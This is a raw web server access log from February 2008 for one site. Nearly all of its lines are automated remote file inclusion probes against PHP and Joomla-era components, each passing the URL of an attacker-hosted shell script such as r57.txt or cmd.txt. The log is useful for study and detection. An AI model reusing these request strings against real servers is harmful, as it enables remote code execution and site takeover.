63.139.243.11 - - [21/Feb/2008:09:35:18 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:09:35:18 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [21/Feb/2008:09:35:18 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:09:36:24 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.pricetrim.com/counter/auction.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:09:36:24 -0800] "GET /logs//?mosConfig_absolute_path=http://www.pricetrim.com/counter/auction.txt? HTTP/1.1" 200 36284 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:09:36:38 -0800] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.winterhude.eu/cache/cmd/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:09:36:39 -0800] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.winterhude.eu/cache/cmd/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:38:06 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.119 - - [21/Feb/2008:09:38:22 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.119 - - [21/Feb/2008:09:38:23 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.119 - - [21/Feb/2008:09:38:24 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:39:14 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:39:31 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:41:00 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:20 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:21 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:21 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:09:41:23 -0800] "GET /logs/access_080131.log/scanhttp://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:09:41:24 -0800] "GET /scanhttp://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:09:41:25 -0800] "GET /logs/scanhttp://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:27 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:27 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:41:28 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:41:57 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:41:57 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:41:59 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.165.243.164 - - [21/Feb/2008:09:41:59 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:41:59 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.165.243.164 - - [21/Feb/2008:09:41:59 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.164 - - [21/Feb/2008:09:41:59 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.107 - - [21/Feb/2008:09:42:00 -0800] "GET /logs/access.log HTTP/1.0" 200 380255 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:42:18 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:42:19 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:43:05 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:43:05 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:43:05 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.33.49.76 - - [21/Feb/2008:09:43:10 -0800] "GET /logs/access_080211.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.clanwac.co.uk/tmp/.../.../cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.49.76 - - [21/Feb/2008:09:43:10 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.clanwac.co.uk/tmp/.../.../cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.49.76 - - [21/Feb/2008:09:43:38 -0800] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.clanwac.co.uk/tmp/.../.../cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:09:43:39 -0800] "GET /logs/access_080211.log/scanhttp://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.198.63.21 - - [21/Feb/2008:09:43:49 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.198.63.21 - - [21/Feb/2008:09:43:49 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.198.63.21 - - [21/Feb/2008:09:43:50 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.103 - - [21/Feb/2008:09:43:58 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:44:15 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:44:19 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
217.22.60.11 - - [21/Feb/2008:09:44:19 -0800] "GET /logs/access_080103.log/index1.php?site=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.60.11 - - [21/Feb/2008:09:44:19 -0800] "GET /logs/index1.php?site=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:09:44:38 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:09:44:38 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:44:46 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:09:46:03 -0800] "GET /logs/access_080203.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.250.121.2 - - [21/Feb/2008:09:46:09 -0800] "GET /config.php?path_to_root=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:48:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:48:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.25.236 - - [21/Feb/2008:09:48:14 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.153.252.233 - - [21/Feb/2008:09:48:21 -0800] "GET //index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
78.153.252.233 - - [21/Feb/2008:09:48:21 -0800] "GET /logs//index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:49:43 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:49:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:49:43 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.194.250.200 - - [21/Feb/2008:09:49:52 -0800] "GET /logs/access_071228.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:49:53 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:49:53 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.243.164 - - [21/Feb/2008:09:50:37 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.225.104 - - [21/Feb/2008:09:50:46 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.193.225.104 - - [21/Feb/2008:09:50:50 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.53.40.2 - - [21/Feb/2008:09:50:52 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ns30794.ovh.net/~ambafranM/local/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:50:57 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:50:57 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:50:57 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:50:57 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:51:46 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:09:51:47 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:09:52:25 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.81 - - [21/Feb/2008:09:52:25 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:09:53:06 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:09:53:06 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:09:53:06 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:53:15 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:53:15 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:53:15 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:53:17 -0800] "GET /logs/access.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:53:30 -0800] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:53:30 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:53:32 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:53:38 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:53:38 -0800] "GET /logs/access_071224.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:09:53:45 -0800] "GET /logs/access_071224.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:54:46 -0800] "GET /logs/access_080117.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:54:46 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:54:46 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:54:47 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:54:59 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:54:59 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:55:24 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:55:28 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:09:55:28 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:09:55:28 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:09:55:28 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:55:37 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:55:40 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.166.67 - - [21/Feb/2008:09:56:04 -0800] "GET /logs/access_080117.log/index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.166.67 - - [21/Feb/2008:09:56:04 -0800] "GET /logs/index.php?body=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:56:06 -0800] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:56:07 -0800] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:56:18 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:56:18 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
193.198.63.21 - - [21/Feb/2008:09:56:20 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:09:56:32 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:57:08 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:57:08 -0800] "GET /logs/access_080122.log/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:57:08 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
